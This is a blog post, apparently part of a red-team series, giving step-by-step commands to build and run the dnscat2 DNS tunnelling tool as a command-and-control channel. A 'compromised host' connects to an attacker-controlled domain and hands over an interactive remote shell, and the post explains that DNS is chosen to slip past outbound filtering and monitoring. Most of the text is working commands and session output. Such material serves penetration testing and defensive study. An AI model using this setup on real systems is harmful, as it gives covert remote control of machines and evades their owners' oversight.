For the second part in this series, we will go over the installation, execution, and use of dnscat2 as a communication channel. Again, nothing groundbreaking here. The main thrust of this is to document some of the setup hiccups I went through while playing with this so that I don’t have to relearn it next time. I will touch a little on some of the how/why as I walk through the steps though. In the third post, I plan to do a deeper dive into what this traffic looks like and how the channel works.
Comms Over DNS
Why DNS? Clearly, it’s not the most robust way to send data. If you walk through this exercise you’ll see it’s about as fast as you would expect it to be since the DNS protocol restricts queries to 255 bytes. First, your protocol of choice may be blocked/monitored outbound. DNS is much less likely to face such restrictions. Second, many organizations with less mature info-sec departments may simply not be looking at DNS traffic for signs of compromise. Reviewing DNS logs might not be at the top of anyone’s to-do list.
Because people like @mattifestation are constantly touting the benefits of thinking like a blue teamer I will also write up some thoughts on detection in the next post.
Setting up and running dnscat2
From the Server
Starting from your C2 server. I’ll assume you are on a distro that has APT available since Ubuntu is pretty common across VPS providers.
apt-get install ruby-dev gcc make gem install bundler git clone https://github.com/iagox86/dnscat2 cd dnscat2/server/ bundle install
Now just test it out with
ruby ./dnscat2.rb and you are ready to roll.
From the Client
Now jump over to your client. This will represent our compromised host in this instance. Our client here is an Ubuntu machine:
apt-get install gcc make git clone https://github.com/iagox86/dnscat2 cd dnscat2/client/ make
You should now have the binary in the client folder ready to run.
There are several fun options for other OS targets. If your target is Windows load up the dnscat2/client/win32/dnscat2.vcproj in VStudio and build it. Also, there is a PowerShell version of the client at https://github.com/lukebaggett/dnscat2-powershell.
Back at the server
In reality, you might want to start your terminal multiplexer of choice (tmux, screen, etc.) but for this test, I think we are safe just firing it up.
ruby ./dnscat2.rb [the-domain-you-setup-from-the-last-post.com] --Secret horse_battery_staple
Over to the client/compromised host
./dnscat [the-domain-you-setup-from-the-last-post.com] --secret horse_battery_staple
Back to the c2 server
Once we have a successful connection we will see:
dnscat2> New window created: 1 Session 1 Security: ENCRYPTED AND VERIFIED! (the security depends on the strength of your pre-shared secret!) dnscat2>
Now we can list active sessions with the
dnscat2> window 0 :: main [active] crypto-debug :: Debug window for crypto stuff [*] dns1 :: DNS Driver running on 0.0.0.0:53 domains = not-evil.network [*] 1 :: command (homebase) [encrypted and verified] [*]
Then interact with a session with the -i flag:
dnscat2> window -i 1 New window created: 1 history_size (session) => 1000 Session 1 Security: ENCRYPTED AND VERIFIED! (the security depends on the strength of your pre-shared secret!) This is a command session! That means you can enter a dnscat2 command such as 'ping'! For a full list of clients, try 'help'. command (homebase) 1>
Now you can have all kinds of fun up to and including an interactive shell. If you issue the
shell command you should see:
New window created: 2 Session 2 Security: ENCRYPTED AND VERIFIED! (the security depends on the strength of your pre-shared secret!)
Now just press ctrl-z to get back to the main window. Then type window:
dnscat2> window 0 :: main [active] crypto-debug :: Debug window for crypto stuff [*] dns1 :: DNS Driver running on 0.0.0.0:53 domains = not-evil.network [*] 1 :: command (homebase) [encrypted and verified] 2 :: sh (homebase) [encrypted and verified] [*]
We see our new widow listed as number 2. We just interact with it with the -i flag:
dnscat2> window -i 3 New window created: 3 history_size (session) => 1000 Session 3 Security: ENCRYPTED AND VERIFIED! (the security depends on the strength of your pre-shared secret!) This is a console session! That means that anything you type will be sent as-is to the client, and anything they type will be displayed as-is on the screen! If the client is executing a command and you don't see a prompt, try typing 'pwd' or something! To go back, type ctrl-z. sh (homebase) 3> ls sh (homebase) 3> controller dnscat dnscat.c dnscat.o drivers libs Makefile tcpcat.c tunnel_drivers win32
There you go. Hack the planet and whatnot!!
Again, nothing even remotely groundbreaking here. Just a step-by-step on setting it up. I’m really looking forward to the next post where I will break down the how of the communication channel and do some packet dissection for illustration. Please let me know if you think I missed anything critical, would like to see more of something or have other constructive advice. @capt_red_beardz